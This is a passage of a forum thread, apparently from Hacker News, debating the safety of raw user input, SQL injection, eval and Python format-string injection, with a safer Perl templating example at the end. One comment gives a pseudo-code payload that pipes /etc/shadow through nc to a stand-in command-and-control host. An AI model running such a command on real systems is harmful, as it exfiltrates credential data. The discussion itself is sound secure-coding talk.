4 ms·
Isn't ingesting user input directly considered a bad idea all around though?
by bubblesocks 10y ago
Isn't ingesting user input directly considered a bad idea all around though?
- foolfoolz 10y agoingesting raw user input is good emitting raw user input is bad
- peller 10y agoIsn't SQL injection caused by ingesting raw user input though? Seems to me you always have to be careful with user-supplied data.
- meowface 10y ago"Ingesting raw user input is good if you only use it to interface with other systems that provide a way to separate data from instructions or at least escape strings."
- foolfoolz 10y agosql injection is commonly caused by combining your query with its related data parameters in unsafe ways. you are emitting raw user input you received to another program, the database, it's your responsibility to give this to the DB safely. you still have to be careful, and when you follow all the right best practices you can safely ingest raw user input. I've worked at a company that escaped user input before inserting into the DB. it's a horrible nightmare I don't think anyone should have to experience.
- halomru 10y agoI would have said that SQL injection is caused by emitting unescaped user input to your SQL server
- tlrobinson 10y agoIf I call eval(string) am I emitting unescaped user input to the eval function? I guess the definition of "injest" here is reading bytes off the wire?
- john_reel 10y agoIf string is unescaped user input, then yes, you are.
- mistaken 10y agoEven if you don't emit the input you can run commands on the server. You can open up a reverse shell or deduce data from timing based side-channels. IMHO working with raw user data is bad; it should be sanitized/canonicalized before doing anything.
- foolfoolz 10y agoif you're running commands on the server I would consider your program as emitting output directly to another program. it's up to you to make sure you call it correctly and not emit raw user data
- nitrogen 10y agoIt seems the format string can run commands on the server. I don't know Python, so this is a pseudo code example that a user could enter: "{system('nc c_and_c_box.example < /etc/shadow \ > /dev/null')} Nothing to see here, move along"
- cyphar 10y agoFormat strings in python are not equivalent to eval. The syntax looks similar, but it's actually limited to evaluating methods and list elements in a given object. Now, with Python's monkeys patchability this is worrying, but it's far from being eval.
- orangecat 10y agoYes, so someone might think to verify that it matches a seemingly safe pattern like "word characters separated by zero or more periods", which is still insufficient.
- raquo 10y agoYes, but it's not obvious how to sanitize input in this case, or that it even needs sanitizing. Formatting a string sounds pretty innocuous.
- userbinator 10y agoI think "it's not obvious how to sanitize input" is the main point here --- one advantage of the %-style format strings, they're easier to parse and escape.
- tedunangst 10y agoBut we don't want the string escaped. We want it interpreted.
- jgalt212 10y agoyes, basically eval is evil
- xapata 10y agoAnd yet, eval is necessary for so many important things...
- masklinn 10y agoThat's not even eval, the entire thing is a series of dynamic attribute lookups[0], you can trivially implement that in pure Python without needing to `eval` anything. [0] it also supports mapping and sequence lookups IIRC but that's about the same thing
- tzs 10y agoWe want it interpreted, but we don't have to let the language handle it directly. A much safer way is to define our own syntax for this and interpret it in our code, with that code only having access to a limited set of safe substitutions. For instance, suppose we want to allow user formatting of contact information. A contact entry has a name, address, phone number, and email address. The user supplies a template string using %_NAME_, %_ADDR_, %_PHONE_, and %_EMAIL where they would like the name, address, phone number, and email address substituted, respectively. I'd probably be doing this in Perl, and I'd do it something like this: sub format_contact { my($template, $name, $addr, $phone, $email) = @_; my %val = (name => $name, addr => $addr, phone => $phone, email => $email); $template =~ s/%_([a-z]+)_/$val{lc($1)}/gi; return $template; }